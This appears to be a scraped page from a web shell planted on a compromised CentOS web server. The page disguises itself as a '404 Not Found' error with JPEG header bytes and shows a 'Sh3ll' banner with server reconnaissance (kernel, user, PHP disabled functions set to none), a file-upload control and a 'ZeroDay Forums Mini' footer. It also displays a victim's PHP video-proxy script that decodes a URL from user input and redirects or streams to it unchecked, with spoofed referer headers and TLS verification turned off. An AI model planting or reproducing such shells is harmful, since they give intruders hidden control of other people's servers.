404 Not Found

��JFIF�� ( %"1"%)+...383,7(-.- 404 Not Found Sh3ll

Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory : /var/www/html/st2/proxy/

Upload File :

Current File : /var/www/html/st2/proxy/test9_phim1.php

<?php
header("Access-Control-Allow-Origin: https://st2.videock.com");
header("Access-Control-Allow-Origin: https://phim1.net");
function str_encode($data,$pwd)
{
    $x = 0;
    $a = 0;
    $j = 0;
    $Zcrypt = '';
    $pwd_length = strlen($pwd);
    for ($i = 0; $i < 255; $i++) {
        $key[$i] = ord(substr($pwd, ($i % $pwd_length)+1, 1));
        $counter[$i] = $i;
    }
    for ($i = 0; $i < 255; $i++) {
        $x = ($x + $counter[$i] + $key[$i]) % 256;
        $temp_swap = $counter[$i];
        $counter[$i] = $counter[$x];
        $counter[$x] = $temp_swap;
    }
    for ($i = 0; $i < strlen($data); $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $counter[$a]) % 256;
        $temp = $counter[$a];
        $counter[$a] = $counter[$j];
        $counter[$j] = $temp;
        $k = $counter[(($counter[$a] + $counter[$j]) % 256)];
        $Zcipher = ord(substr($data, $i, 1)) ^ $k;
        $Zcrypt .= chr($Zcipher);
    }
    return $Zcrypt;
}
$url_encode = $_GET['file'];
$arr_url = explode('123vidnet',$url_encode);
$url = base64_decode($arr_url[0]);
$url = str_encode(hex2bin($url),'123Vid@Net');
$url = $url.$arr_url[1];

$seconds_to_cache = 8640000;
$ts = gmdate("D, d M Y H:i:s", time() + $seconds_to_cache) . " GMT";
$head[] = "Origin: https://kissasian.es";
$head[] = "Referer: https://kissasian.es/";
$head[] = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36";

$useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36";
$v = $url;

$arr_v = (get_headers($v,true));
$v = str_replace('?e=download','',$arr_v['Location']);

/*$ch = curl_init();
curl_setopt($ch, CURLOPT_VERBOSE, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 222);
curl_setopt($ch, CURLOPT_URL, $v);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FRESH_CONNECT, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
$info = curl_exec($ch);

$size2 = curl_getinfo($ch, CURLINFO_CONTENT_LENGTH_DOWNLOAD);*/


/*$filesize = $size2;
$offset = 0;
$length = $filesize;*/
header('Location: '.$v);
exit();

$http_origin = $_SERVER['HTTP_ORIGIN'];

if ($http_origin == "https://www.123vid.net" || $http_origin == "https://st2.videock.com")
{
    header("Access-Control-Allow-Origin: $http_origin");
}
header("Access-Control-Allow-Methods: GET");
header("Access-Control-Allow-Headers: x-test-header, Origin, X-Requested-With, Content-Type, Accept, Range");
header('Accept-Ranges: bytes');
header("Expires: $ts");
header("Pragma: cache");
header("Cache-Control: max-age=$seconds_to_cache");
header("Connection: keep-alive");

//header("Content-length: ".$size2);
header("Content-Type: video/MP2T");
//header("Server: OpenStream 1.0");
//header ("Content-Disposition: attachment;filename=".basename($url));


$ch = curl_init();
curl_setopt($ch, CURLOPT_VERBOSE, 1);
//curl_setopt($ch, CURLOPT_TIMEOUT, 2);
curl_setopt($ch, CURLOPT_URL, $v);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_FRESH_CONNECT, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_NOBODY, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
curl_exec($ch);
curl_close($ch);
exit();
?>

ZeroDay Forums Mini